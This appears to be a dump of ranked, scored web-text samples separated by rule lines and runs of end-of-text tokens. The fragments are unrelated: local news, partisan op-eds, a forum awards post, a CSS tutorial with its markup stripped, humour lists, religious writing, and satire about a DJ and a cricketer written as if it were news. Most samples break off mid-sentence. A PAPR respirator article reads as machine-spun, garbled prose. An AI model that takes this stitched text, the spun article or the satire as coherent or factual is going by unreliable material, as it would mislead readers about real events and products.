><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 64; Score = 7831552.0 +<|begin_of_text|>The flag decals that were ordered taken down by Chief Bronaugh. Photographs courtesy Maywood Fire Department. + +Tuesday, September 9, 2014 || By Michael Romain + +Today, four Maywood firefighters were sent home, pending disciplinary action, for failure to comply with a direct order, according to Chief Craig Bronaugh. A CBS Local report noted that more firefighters could be sent home tomorrow. The firefighters apparently refused to remove American flag decals from their lockers and helmets. + +“A representative from Service Employees International Union Local 73, which represents the firefighters, met for an hour with Chief Bronaugh Tuesday afternoon, with the union hoping Chief Bronaugh would modify his order. Instead, he ordered the firefighters sent home immediately, pending disciplinary action,” according to the CBS report. + +“Union spokesman Adam Rosen said he is ‘shocked’ that an agency of first responders would enforce such an order the week of Sept. 11. + +“The four suspended firefighters said they were told that the order was issued because of racial discord [in] the department. The four, who include two white firefighters, a black firefighter, and a fourth firefighter who is a Cuban émigré, said no such problems exist,” wrote CBS, which also reported that the four firefighters trace the issue “to a decision by several firefighters to replace a tattered American flag last month in one of Maywood’s firehouses. The new flag mysteriously disappeared early Aug. 23. The order on decals was issued last week.” + +Although the CBS report indicates that the department “has had no such order in the recent past,” an internal memo released by the Office of Chief Bronaugh noted that this kind of conflict has nonetheless appeared before: + +Under no circumstances at anytime are there to be decals/stickers on Fire Department lockers or helmets. Any decals/stickers are to be removed immediately. No inquiry will be entertained regarding this matter. + +TO BE READ AT ALL ROLL CALLS THRU SEPTEMBER 10, 2014 + +This was in response to an inquiry regarding an American Flag being put up in the fire station (replacing a torn and tattered flag that previously existed). That flag was stolen on the very next shift day. Firefighters were upset that the flag was stolen and in response placed American Flag decals on their personal lockers in the stations. + +This is not the first time that a flag incident has occurred in the Maywood Fire Department. Approximately 10 years ago, all American Flag decals were removed from all of the department vehicles and +================================================================================ +Rank = 65; Score = 7733248.0 +<|begin_of_text|>Usually our advertisers are the sponsors who help pay our expensive web server bills every month. Now there's another option. We have developed a way to... + +1) Remove the ads. + +2) Show you all the non-yoga pants pics we receive in our email. + +3) Build an elite community of yoga pants connoisseurs. + +4) Give you an honorary seat on the Girls In Yoga Pants Board of Directors. + +5) Keep our servers online. + +...and more. Starting at ONE DOLLAR. Sponsor Login/Signup Usually our advertisers are the sponsors who help pay our expensive web server bills every month. Now there's another option. We have developed a way to...Remove the ads.Show you all the non-yoga pants pics we receive in our email.Build an elite community of yoga pants connoisseurs.Give you an honorary seat on the Girls In Yoga Pants Board of Directors.Keep our servers online....and more. Starting at + +Yoga pants are gorgeous and elite. They have become highly acceptable across the globe along fashionable women. Their versatility is one other factor that makes them appealing. They look casual and give the impression that you are putting on your favorite big booty loungewear. You can pair your pants with cute accessories to give an eye-catching statement of elegance. You can also pair them with heavily accented jackets or urban tees if you so desire.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 66; Score = 7700480.0 +<|begin_of_text|>jeremy + +root + +Registered: Jun 2000 Distribution: Debian, Red Hat, Slackware, Fedora, Ubuntu Posts: 12,933 + +Rep: + +2007 LinuxQuestions.org Members Choice Award Winners + +Desktop Distribution of the Year - Ubuntu (30.83%) + +Server Distribution of the Year - Debian (30.30%) + +Live Distribution of the Year - KNOPPIX (22.88%) + +Database of the Year - MySQL (54.36%) + +Office Suite of the Year - OpenOffice.org (89.50%) + +Browser of the Year - Firefox (74.03%) + +Desktop Environment of the Year - KDE (52.08%) + +Window Manager of the Year - Compiz (33.65%) + +Messaging App of the Year - Pidgin (53.90%) + +Mail Client of the Year - Thunderbird (53.72%) + +Virtualization Product of the Year - VirtualBox (41.58%) + +Audio Media Player Application of the Year - Amarok (57.37%) + +Audio Authoring Application of the Year - Audacity (68.24%) + +Video Media Player Application of the Year - mplayer (41.78%) + +Video Authoring Application of the Year - mencoder (24.21%) + +Multimedia Utility of the Year - K3b (63.34%) + +Graphics Application of the Year - GIMP (69.15%) + +Network Security Application of the Year - nmap (24.95%) + +Host Security Application of the Year - SELinux (30.69%) + +Monitoring Application of the Year - Nagios (38.58%) + +Windows on Linux App of the Year - Wine (84.76%) + +IDE/Web Development Editor of the Year - Eclipse (22.29%) + +Shell of the Year - bash (87.33%) + +Text Editor of the Year - vi/vim (36.37%) + +File Manager of the Year - Konqueror (38.00%) + +Open Source Game of the Year - Battle for Wesnoth (21.74%) + +Programming Language of the Year - Python (21.78%) + +Winners should expect an email, including a nice winners badge in about a day or so. If you have any questions or suggestions on how we can improve the MCA's next year, do let me know. Visit + +--jeremy The polls are closed and the results are in. We had a record number of votes cast for the seventh straight year. Congratulations should go to all nominees. We had some extremely close races this year. Without further ado, here are the winners:Desktop Distribution of the Year - +================================================================================ +Rank = 67; Score = 7700480.0 +<|begin_of_text|>First they said the downing of Russian Metrojet Flight 9268 was most likely due to Russia’s “notorious” regional airlines, which supposedly are rickety and unreliable. The Egyptian government denied that terrorism is even a possibility, with Egyptian despot Abdel Fatah al-Sisi proclaiming: + +“When there is propaganda that it crashed because of Isis, this is one way to damage the stability and security of Egypt and the image of Egypt. Believe me, the situation in Sinai – especially in this limited area – is under our full control.” + +However, it soon came out that the person in charge of Sharm el-Sheikh airport, where the Russia plane had landed before taking off again, had been “replaced” – oh, but not because of anything to do with the downing of the Russian passenger plane! As the Egyptian authorities put it: + +“Adel Mahgoub, chairman of the state company that runs Egypt’s civilian airports, says airport chief Abdel-Wahab Ali has been ‘promoted’ to become his assistant. He said the move late Wednesday had nothing to do with media skepticism surrounding the airport’s security. Mahgoub said Ali is being replaced by Emad el-Balasi, a pilot.” + +Laughable, albeit in a sinister way, and yet more evidence that something wasn’t quite right: after all, everyone knows the Egyptian government does not have the Sinai, over which the plane disintegrated in mid air, under its “full control.” ISIS, which claimed responsibility for the crash hours after it occurred, is all over that peninsula. + +Still, the denials poured in, mostly from US government officials such as Director of National Intelligence James “Liar-liar-pants-on-fire” Clapper, who said ISIS involvement was “unlikely.” Then they told us it couldn’t have been ISIS because they supposedly don’t have surface-to-air missiles that can reach the height attained by the downed plane. Yet that wasn’t very convincing either, because a) How do they know what ISIS has in its arsenal?, and b) couldn’t ISIS or some other group have smuggled a bomb on board? + +The better part of a week after the crash, we have this: + +“Days after authorities dismissed claims that ISIS brought down a Russian passenger jet, a U.S. intelligence analysis now suggests that the terror group or its affiliates planted a bomb on the plane. + +“British Foreign Minister Philip Hammond said his government believes there is a ‘significant possibility’ that an explosive device caused the crash. And +================================================================================ +Rank = 68; Score = 7700480.0 +<|begin_of_text|>With CSS 3D transformations supported by most modern browsers nowadays, we can enrich our web projects with powerful animations, and be confident most users will enjoy the full experience. Today's template is just an example of how to turn a flat app screen into a 3D mockup, and animate it. We also integrated a popular resource, Points of Interest. + +Inspiration came from Prismic.io. + +Creating the structure + +The HTML is structured in 2 main

elements (.cd-product-intro and.cd-product-mockup ) – the first containing the product intro (title, action buttons..) and the second the mockup (and the points of interest) – wrapped inside a section.cd-product. + +
+ +Two additional
elements (.cd-3d-right-side and the.cd-3d-bottom-side ) have been used to create the 3d sides of the mockup, while the.cd-product-mockup::before pseudo-element has been used to create the shadow. + +Adding style + +On small devices the CSS is pretty straightforward (you can give +================================================================================ +Rank = 69; Score = 7700480.0 +<|begin_of_text|>President Obama has won reelection, and his administration has asked state officials to decide by Friday, November 16, whether their state will create one of Obamacare’s health-insurance “exchanges.” States also have to decide whether to implement the law’s massive expansion of Medicaid. The correct answer to both questions remains a resounding no. + +State-created exchanges mean higher taxes, fewer jobs, and less protection of religious freedom. States are better off defaulting to a federal exchange. The Medicaid expansion is likewise too costly and risky a proposition. Republican Governors Association chairman Bob McDonnell (R.,Va.) agrees, and has announced that Virginia will implement neither provision. + +There are many arguments against creating exchanges. + +First, states are under no obligation to create one. + +Second, operating an Obamacare exchange would be illegal in 14 states. Alabama, Arizona, Georgia, Idaho, Indiana, Kansas, Louisiana, Missouri, Montana, Ohio, Oklahoma, Tennessee, Utah, and Virginia have enacted either statutes or constitutional amendments (or both) forbidding state employees to participate in an essential exchange function: implementing Obamacare’s individual and employer mandates. + +Third, each exchange would cost its state an estimated $10 million to $100 million per year, necessitating tax increases. + +Fourth, the November 16 deadline is no more real than the “deadlines” for implementing REAL ID, which have been pushed back repeatedly since 2008. + +Fifth, states can always create an exchange later if they choose. + +Sixth, a state-created exchange is not a state-controlled exchange. All exchanges will be controlled by Washington. + +Seventh, Congress authorized no funds for federal “fallback” exchanges. So Washington may not be able to impose Exchanges on states at all. + +Eighth, the Obama administration has yet to provide crucial information that states need before they can make an informed decision. + +Ninth, creating an exchange sets state officials up to take the blame when Obamacare increases insurance premiums and denies care to the sick. State officials won’t want their names on this disastrous mess. + +Tenth, creating an exchange would be assisting in the creation of a “public option” that would drive domestic health-insurance carriers out of business through unfair competition. + +Eleventh, Obamacare remains unpopular. The latest Kaiser Family Foundation poll found that only 38 percent of the public supports it. + +Twelfth, defaulting to a federal exchange exempts a state’s employers from the employer mandate — a tax of $2,000 per worker per year (the tax applies to companies with more than 59 employees, but for such +================================================================================ +Rank = 70; Score = 7700480.0 +<|begin_of_text|>The U.S. One Cent coin, or penny, has almost no purchasing power today. The cost of making the pennies (1.66 cents each) is higher than face value, and the melt value of pennies ranges from more than two cents for the pre-1982 copper pennies, to nearly a full cent for the copper plated zinc pennies. However, the penny is a very sentimental coin to most Americans, and many people fear that eliminating the penny would raise prices because things would need to be rounded up to the nearest nickel. + +Both sides in the penny debate make some good points, and the solution is far from being an easy decision. This article takes a look at the issues involved in the pro-penny and the anti-penny debate so that you can make up your mind about where you stand on this critical matter. + +Background + +The United States has eliminated a small denomination coin in the past with relatively little trouble. In 1857, the Mint stopped making the half-cent coin, partly because the cost of making it had exceeded its face value, and somewhat because it was considered to be too small a denomination that it was no longer needed. + +Back in 1857, the half-cent had the purchasing power that would translate to well over ten cents today, so in some ways, it was akin to our eliminating the dime. Commerce continued without any major hiccups, even though the one-cent copper coin suddenly shrunk from a hefty, over an inch in diameter piece of copper that weighed almost 11 grams, to a penny that was less than half the weight and 40% smaller. + +Other significant changes in U.S. coinage occurred without any catastrophic effects on commerce. In 1965 the U.S. Mint stopped making 90% silver dimes, quarters, and half dollars and changed them over to base metal clad versions. The outer shell was made out of 75% copper and 25% nickel bonded to a core of pure copper. A few people groused about it, but commerce continued unabated. + +There have been several other minor changes in the coin metal composition. These composition changes ranged from temporary wartime alterations during World War II, to more permanent switches like using zinc instead of copper for the penny. More recently, the mint changed the cupro-nickel clad dollar coin (the Susan B. Anthony) to the "golden dollar" type used in the Sacagawea and Presidential Dollar types. None of these changes caused any significant problems in commerce. + +Many foreign nations have +================================================================================ +Rank = 71; Score = 7667712.0 +<|begin_of_text|>Massachusetts Sen. Elizabeth Warren grilled Wells Fargo CEO John Stumpf on Tuesday for his role in a widespread scheme in which thousands of bankers opened more than 2 million accounts for customers without them knowing over at least five years. + +“You should resign. You should give back the money you took while this scam was going on and you should be criminally investigated,” Warren told Stumpf, after he admitted under Warren’s grilling he hadn’t yet been held personally accountable for the actions of his employees. + +The Democratic senator also forced Stumpf, who was under questioning from the Senate banking committee over his bank’s handling of the scam, to admit that no senior executives have been held accountable for the actions of the low-level bankers. + +Some forged signatures and committed identity theft to open fraudulent bank accounts, while under pressure to meet sales targets or be fired. These employees, Stumpf explained earlier in the committee hearing, were “well-paid,” making between $30,000 and $60,000 a year. Stumpf made $19.3 million in 2015. + +“This just isn’t right,” Warren said. “You squeezed employees to the breaking point” to drive up the stock price and your compensation, she said, referencing the bank’s fierce drive to “cross-sell” or make customers open up multiple accounts. “You went on television to blame thousands of $12-an-hour” workers. + +“It’s gutless leadership,” Warren said. + +Last week Stumpf in a televised interview appeared to blame low-level workers for this behavior, which was widespread throughout the bank ― 5,300 employees were fired for their involvement. + +A cashier who “steals a handful of $20s” is held accountable, Warren said. Bank executives aren’t. + +“The only way Wall Street will change will be if executives face jail time” for criminal behavior, she said. + +In the Wells Fargo scandal, people were mistakenly charged fees, saw their credit ratings fall, got credit cards in the mail they never asked for or just were confused. + +The bank said that it had fired the thousands of employees from 2011 to 2016 for engaging in the practice. Stumpf tried on Tuesday to make the case that this was a few bad apples, explaining the firings amounted to 1 percent of the bank’s 100,000 retail bankers every year. + +The incentive to open fake accounts was strong: Wells Fargo bankers received quarterly bonuses for cross-selling. Stumpf said on Tuesday that the lowest-paid bank workers make $12 an hour +================================================================================ +Rank = 72; Score = 7667712.0 +<|begin_of_text|>CTV Kitchener + +Justin Bieber faces two criminal charges following an alleged altercation in Perth County. + +OPP say they were called to Line 40 east of Road 106 – east of the singer's hometown of Stratford and northeast of Shakespeare – shortly before 3 p.m. last Friday in response to a crash between a minivan and an ATV, both of which were carrying two people. + +“It appeared that one of the occupants of the van and the operator of the ATV had words,” Const. Kees Wijnands told reporters Tuesday afternoon. + +“There was an altercation that took place, and as a result of that, we ended up arresting Justin Bieber.” + +In an email to The Canadian Press, the pop star’s lawyer blamed the paparazzi for the incident. + +“Justin Bieber and Selena Gomez’s peaceful retreat in Stratford this weekend was unfortunately disrupted by the unwelcome presence of the paparazzi,” Brian Greenspan said. + +“Mr. Bieber and Ms. Gomez have fully cooperated in the police investigation. We are hopeful that this matter will be quickly resolved.” + +Los Angeles-based lawyer Gloria Allread said she's representing two "victims" in the incidents, but did not indicate whether her clients are photographers. + +Police likewise would not say if they believed the minivan’s occupants to be paparazzi, but did confirm that Bieber was driving the ATV. + +“Justin’s demeanour, when we dealt with him, was very positive,” Wijnands said. + +Bieber, 20, posted pictures of himself and on-and-off girlfriend Gomez riding an ATV online on Friday. + +That same day, he and his father posted pictures of themselves riding horses. + +Bieber faces charges of dangerous driving and assault. Police say he was released from custody on a promise to appear in court. + +His next court date is set for Sept. 29. + +No injuries were reported as a result of the crash. + +With files from The Canadian Press<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 73; Score = 7634944.0 +<|begin_of_text|>Ravers were left shocked at Corsica Studios this week after a local techno DJ spontaneously combusted with rage after a member of the crowd referred to his set as ‘Tech-House’. + +The DJ, whose name was later revealed to be Dave Lester, 32, from Lewisham, had been playing a sub-standard selection of repetitive tunes when a member of the crowd proceeded to the DJ booth. The crowd member was then seen talking into Lester’s ear, at which point the convulsions began at once. + +“He started shaking uncontrollably straight away,” crowd member Jody Smith told us afterwards. “If I heard correctly, the dude leaned over and said to him, ‘I’m really enjoying your selection: top tech-house music.’ Then the DJ’s mouth started frothing with blood and foam, his eyes seemed to pop out of their sockets with anger, and his fists clenched as if he had suddenly become some hideous techno version of the Incredible Hulk. He then collapsed twitching onto the floor, screaming in a blood-curdling voice the words ‘Jeff Mills is not Tech-House!’ over and over again.” + +As the convulsions continued, onlooker Andrew Harris, who later identified himself as a friend of the deceased, was one of the first on the scene. + +“The sound technician has already jumped in and begun to administer CPR,” Harris told us, “but Dave simply squealed that the pumps to his chest were not being delivered in four to the floor time and physically threw him to one side. The sound technician responded by observing the fact that a techno tempo is too slow for effective CPR. It was at that point Dave simply exploded all over the concerned onlookers and over the decks.” + +Lester was taken to hospital immediately afterwards, but was confirmed dead upon arrival. Doctors issued the following statement: “We’ve known about this condition, known in the medical journals as Techno Snobbery, for some time now, but this is the first time that we’ve ever seen anyone spontaneously combust with rage due to it. + +“We would offer the following advice to techno DJs,” the statement continued. “Techno Snobbery is a condition that can often show no symptoms for many years, yet it has been documented that it can emerge suddenly at any time due to the slightest provocation. Therefore, techno DJs should remember that genre categorisations are largely permeable and superfluous, and that a fan referring to their music as Tech-House is therefore not a derogatory comment and can, in some circumstances +================================================================================ +Rank = 74; Score = 7602176.0 +<|begin_of_text|>Music Humor - Rules Of The Blues + +back to Music Humor Page + +Author unkown. (Wish we knew, 'cause it's really funny) + +1. Most Blues begin, "Woke up this morning..." + +2. "I got a good woman" is a bad way to begin the Blues, unless you stick something nasty in the next line like, "I got a good woman, with the meanest face in town." + +3. The Blues is simple. After you get the first line right, repeat it. Then find something that rhymes... sort of: "Got a good woman with the meanest face in town. Yes, I got a good woman with the meanest face in town. Got teeth like Margaret Thatcher, and she weigh 500 pound." + +4. The Blues is not about choice. You stuck in a ditch, you stuck in a ditch--ain't no way out. + +5. Blues cars: Chevys, Fords, Cadillacs and broken-down trucks. Blues don't travel in Volvos, BMWs, or Sport Utility Vehicles. Most Blues transportation is a Greyhound bus or a southbound train. Jet aircraft and company motor pools ain't even in the running. Walkin' plays a major part in the blues lifestyle. So does fixin' to die. + +6. Teenagers can't sing the Blues. They ain't fixin' to die yet. Adults sing the Blues. In Blues, "adulthood" means being old enough to get the electric chair if you shoot a man in Memphis. + +7. Blues can take place in New York City but not in Hawaii or any place in Canada. Hard times in Minneapolis or Seattle is probably just clinical depression. Chicago, St. Louis, and Kansas City are still the best places to have the Blues. You cannot have the blues in any place that don't get rain. + +8. A man with male pattern baldness ain't the blues. A woman with male pattern baldness is. Breaking your leg cause you were skiing is not the blues. Breaking your leg 'cause a alligator be chompin' on it is. + +9. You can't have no Blues in a office or a shopping mall. The lighting is wrong. Go outside to the parking lot or sit by the dumpster. + +10. Good places for the Blues: + +a. Highway + +b. Jailhouse + +c. An empty bed + +d. Bottom of a whiskey glass + +11. Bad places for the Blues: + +a. Nord +================================================================================ +Rank = 75; Score = 7503872.0 +<|begin_of_text|>Gov. Rick Perry was in Connecticut last week touting all the advantages of doing business in Texas, which seem to be: + +You don't have to pay taxes. + +You don't have to pay employees. + +And don't have to pay attention to any of those pesky government regulations. + +It sounded just swell. The only disadvantage I could see was, well, you have to live in Texas. + +Texas is a lot different from Connecticut. Moving there will require cultural adjustments akin to resettling in a different country. For all those who will be following Gov. Perry back to the Lone Star State, here are a few things to know about your new home. + +Size Matters + +Texas is big, really big. It is larger than all of New England, New York, Pennsylvania, Ohio and Illinois combined, and is the second most populous state after California (which doesn't include cattle, of which there are some 16 million.) + +Brewster, the largest county in Texas, is larger than Connecticut, and the King Ranch in South Texas is larger than Rhode Island. + +Texas Has Some Strange Local Laws + +In Texas, it is illegal for children to have unusual haircuts. + +In Texas, it is illegal to milk another person's cow (That may be illegal here, too.) + +In Texas, it is illegal for one to shoot a buffalo from the second story of a hotel. (Another reason it is always better to be on the ground floor.) + +In Texas, it is illegal to take more than three sips of beer at a time while standing. (I don't know how they enforce this.) + +In Texas, it is Illegal to indecently expose yourself or swear in front of a corpse. (OK, I can see where flashing a corpse would be unacceptable, but swearing?) + +In Texas, it is illegal to emit obnoxious odors while in an elevator. (I'd have to check but I believe they hang you for that.) + +Texas Is Home To A Lot Of Weather Extremes + +The highest temperature ever recorded in Texas was 120 degrees, the lowest minus 23. + +Texas averages 139 tornadoes a year, most in the United States. + +Texas is dry, its latest drought being the worst since 1789. + +Texas is getting hotter, last summer was the hottest on record. + +Texas Has Issues + +Texas is tied with Mississippi for having the highest percentage of U.S. workers in minimum-wage jobs. + +Texas has the country's fourth-highest poverty rate. + +Texas ranks first for children without health insurance. + +So, advice for those +================================================================================ +Rank = 76; Score = 7471104.0 +<|begin_of_text|>We live in a world of pain and suffering. There is no one who is not affected by the harsh realities of life, and the question “why do bad things happen to good people?” is one of the most difficult questions in all of theology. God is sovereign, so all that happens must have at least been allowed by Him, if not directly caused by Him. At the outset, we must acknowledge that human beings, who are not eternal, infinite, or omniscient, cannot expect to fully understand God’s purposes and ways.The book of Job deals with the issue of why God allows bad things to happen to good people. Job was a righteous man (Job 1:1), yet he suffered in ways that are almost beyond belief. God allowed Satan to do everything he wanted to Job except kill him, and Satan did his worst. What was Job’s reaction? “Though he slay me, yet will I hope in him” (Job 13:15). “The LORD gave and the LORD has taken away; may the name of the LORD be praised” (Job 1:21). Job did not understand why God had allowed the things He did, but he knew God was good and therefore continued to trust in Him. Ultimately, that should be our reaction as well.Why do bad things happen to good people? As hard as it is to acknowledge, we must remember that there are no “good” people, in the absolute sense of the word. All of us are tainted by and infected with sin (Ecclesiastes 7:20; Romans 3:23; 1 John 1:8). As Jesus said, “No one is good—except God alone” (Luke 18:19). All of us feel the effects of sin in one way or another. Sometimes it’s our own personal sin; other times, it’s the sins of others. We live in a fallen world, and we experience the effects of the fall. One of those effects is injustice and seemingly senseless suffering.When wondering why God would allow bad things to happen to good people, it’s also good to consider these four things about the bad things that happen:1) Bad things may happen to good people in this world, but this world is not the end. Christians have an eternal perspective: “We do not lose heart. Though outwardly we are wasting away, yet inwardly we are being renewed day by day. For our light and momentary troubles are achieving for us an eternal glory that far +================================================================================ +Rank = 77; Score = 7471104.0 +<|begin_of_text|>For full respiratory protection in a setting where there are dangerous airborne chemicals or bits to emulate, putting on an ideal face mask and filter device is definitely essential for any kind of employee. Of course there is a setback with wearing a regular face mask for hard common labor, which is that it is really effort having to breathe with an air filter, making job more stressful, and triggering exhaustion to establish in far more swiftly. + +By selecting one of the current PAPR masks (Powered Air Purifying Respirators) over traditional versions, there are a lot of outstanding benefits to be had. The first and the majority of quickly apparent among these is that rather of the laborer needing to strive to take a breath via a filter, the electric battery powered air pump connected to the PAPR masks drives air through a thorough filter system, and delivers it directly in to the face mask. The air is amazing in the PAPR mask as a result of the length of the pipe permitting disturbance to clear up away, and relying on the filter made use of in the system nearly all bits can be taken out. + +The following significant perk for employees utilizing a PAPR mask when functioning is that since all the hefty elements - the electric motor and filters - are consisted of within a belt installed unit, the mask itself is too much lighter compared to a regular model. This makes it a lot a lot more comfortable to use for long durations of time, as well as lessens the quantity of muscular tissue exhaustion felt by users when they are utilizing the PAPR mask. + +There are a selection of different PAPR masks available, and although they all discuss the very same standard attributes of having the cleanser and air pump affixed to the belt and the mask as a separate thing, they can be utilized for different objectives, and customers ought to consider exactly what their specific requirements are just before spending for among these items. + +The most significant advantage of a PAPR mask over a hood with an air filter is that it is a wonderful bargain much more versatile for the user, since it is lightweight, and supplies exceptional presence. With a conventional soft hood mask, the peripheral vision of the user is decreased, making them unsuitable to wear within a harmful atmosphere. + +To get the maximum gain from putting on a PAPR mask, you need to make certain that it is appropriately suited, working appropriately, and regularly examined and maintained. The air purifying pump should be kept clear of blockages, and the user ought to examine that the mask has a good seal around their +================================================================================ +Rank = 78; Score = 7471104.0 +<|begin_of_text|>Amir has also been ordered to not stare soulfully at cameras anymore © AFP + +Following criticism of Mohammad Amir's early return to cricket after his spot-fixing ban, the ICC today announced the left-arm quick would only be allowed to bowl right-arm offspin in a long-sleeved top so "no one can ever forget he's a bit shifty". + +There had been fears letting Amir back ahead of schedule sent a message his past behaviour was completely forgiven, but this latest sanction, the ICC believes, will ensure the Pakistani youngster will continue to be widely stigmatised because, in the words of one Dubai official, "everyone knows what these offspinners get up to". + +Speaking outside the Indian Supreme Court, Head of the ICC Ethics Enforcement Unit, N Srinivasan, explained the idea: ''A lot of people were a bit miffed at us letting Amir come back early, so we decided to add an extra punishment to guarantee no one will ever, ever consider him above suspicion. We couldn't think of anything more likely to ruin his reputation in the current climate than forcing him to play as an offspinner. + +"Well, we were toying with the idea of making him India's overseas bowling coach, but in the end we decided even a convicted felon didn't deserve that." The deputy head of the ICC Ethics Enforcement Unit, N Srinivasan, claimed that this was in no way another clever ruse from the Big Three to prevent other countries from having any decent bowlers whatsoever: ''We haven't insisted Wayne Parnell becomes an offspinner, have we?'' he argued convincingly. + +Amir himself was understandably upset about the plan, taking to social media to suggest the shame of being imprisoned for spot-fixing was nothing compared to the disgrace of having to bowl offspin in 2015. After listing his profile location as "a small village", the fallen idol sent out a number of distraught tweets claiming he "couldn't stand all the whispering and finger-pointing'' to which he'd be subjected if he was forced to send down the same category of delivery as Mohammad Hafeez and Saeed 